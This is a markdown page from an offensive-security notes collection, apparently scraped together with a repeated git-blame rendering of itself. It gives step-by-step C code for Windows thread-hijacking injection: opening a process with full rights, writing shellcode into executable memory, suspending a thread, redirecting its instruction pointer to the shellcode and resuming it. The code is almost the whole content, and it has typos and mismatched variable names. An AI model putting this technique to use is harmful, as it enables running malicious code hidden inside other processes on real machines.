killchain-compendium/Exploits/Windows/Thread Hijacking.md

# Thread Hijacking

* Open process, allocate and write memory
```c
HANDLE hProcess = OpenProcess(
	PROCESS_ALL_ACCESS, // Requests all possible access rights
	FALSE, // Child processes do not inheret parent process handle
	processId // Stored process ID
);
PVOIF remoteBuffer = VirtualAllocEx(
	hProcess, // Opened target process
	NULL, 
	sizeof shellcode, // Region size of memory allocation
	(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
	PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
);
WriteProcessMemory(
	processHandle, // Opened target process
	remoteBuffer, // Allocated memory region
	shellcode, // Data to write
	sizeof shellcode, // byte size of data
	NULL
);
```

* Snapshot the process and get the first thread
```c
THREADENTRY32 threadEntry;

HANDLE hSnapshot = CreateToolhelp32Snapshot( // Snapshot the specificed process
	TH32CS_SNAPTHREAD, // Include all processes residing on the system
	0 // Indicates the current process
);
Thread32First( // Obtains the first thread in the snapshot
	hSnapshot, // Handle of the snapshot
	&threadEntry // Pointer to the THREADENTRY32 structure
);

while (Thread32Next( // Obtains the next thread in the snapshot
	snapshot, // Handle of the snapshot
	&threadEntry // Pointer to the THREADENTRY32 structure
)) {
```

* Get Pointer to the thread
```c
if (threadEntry.th32OwnerProcessID == processID) // Verifies both parent process ID's match
		{
			HANDLE hThread = OpenThread(
				THREAD_ALL_ACCESS, // Requests all possible access rights
				FALSE, // Child threads do not inheret parent thread handle
				threadEntry.th32ThreadID // Reads the thread ID from the THREADENTRY32 structure pointer
			);
			break;
		}
```

* Suspend threat ,get context and change `$rip`
```
SuspendThread(hThread);
CONTEXT context;
GetThreadContext(
	hThread, // Handle for the thread 
	&context // Pointer to store the context structure
);
context.Rip = (DWORD_PTR)remoteBuffer; // Points RIP to our malicious buffer allocation
```

* Set context and resume the thread
```c
SetThreadContext(
	hThread, // Handle for the thread 
	&context // Pointer to the context structure
);
ResumeThread(
	hThread // Handle for the thread
);
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# Thread Hijacking`

			`* Open process, allocate and write memory`
			```c
			`HANDLE hProcess = OpenProcess(`
			`PROCESS_ALL_ACCESS, // Requests all possible access rights`
			`FALSE, // Child processes do not inheret parent process handle`
			`processId // Stored process ID`
			`);`
			`PVOIF remoteBuffer = VirtualAllocEx(`
			`hProcess, // Opened target process`
			`NULL,`
			`sizeof shellcode, // Region size of memory allocation`
			`(MEM_RESERVE \| MEM_COMMIT), // Reserves and commits pages`
			`PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages`
			`);`
			`WriteProcessMemory(`
			`processHandle, // Opened target process`
			`remoteBuffer, // Allocated memory region`
			`shellcode, // Data to write`
			`sizeof shellcode, // byte size of data`
			`NULL`
			`);`
			```

			`* Snapshot the process and get the first thread`
			```c
			`THREADENTRY32 threadEntry;`

			`HANDLE hSnapshot = CreateToolhelp32Snapshot( // Snapshot the specificed process`
			`TH32CS_SNAPTHREAD, // Include all processes residing on the system`
			`0 // Indicates the current process`
			`);`
			`Thread32First( // Obtains the first thread in the snapshot`
			`hSnapshot, // Handle of the snapshot`
			`&threadEntry // Pointer to the THREADENTRY32 structure`
			`);`

			`while (Thread32Next( // Obtains the next thread in the snapshot`
			`snapshot, // Handle of the snapshot`
			`&threadEntry // Pointer to the THREADENTRY32 structure`
			`)) {`
			```

			`* Get Pointer to the thread`
			```c
			`if (threadEntry.th32OwnerProcessID == processID) // Verifies both parent process ID's match`
			`{`
			`HANDLE hThread = OpenThread(`
			`THREAD_ALL_ACCESS, // Requests all possible access rights`
			`FALSE, // Child threads do not inheret parent thread handle`
			`threadEntry.th32ThreadID // Reads the thread ID from the THREADENTRY32 structure pointer`
			`);`
			`break;`
			`}`
			```

			* Suspend threat ,get context and change `$rip`
			```
			`SuspendThread(hThread);`
			`CONTEXT context;`
			`GetThreadContext(`
			`hThread, // Handle for the thread`
			`&context // Pointer to store the context structure`
			`);`
			`context.Rip = (DWORD_PTR)remoteBuffer; // Points RIP to our malicious buffer allocation`
			```

			`* Set context and resume the thread`
			```c
			`SetThreadContext(`
			`hThread, // Handle for the thread`
			`&context // Pointer to the context structure`
			`);`
			`ResumeThread(`
			`hThread // Handle for the thread`
			`);`
			```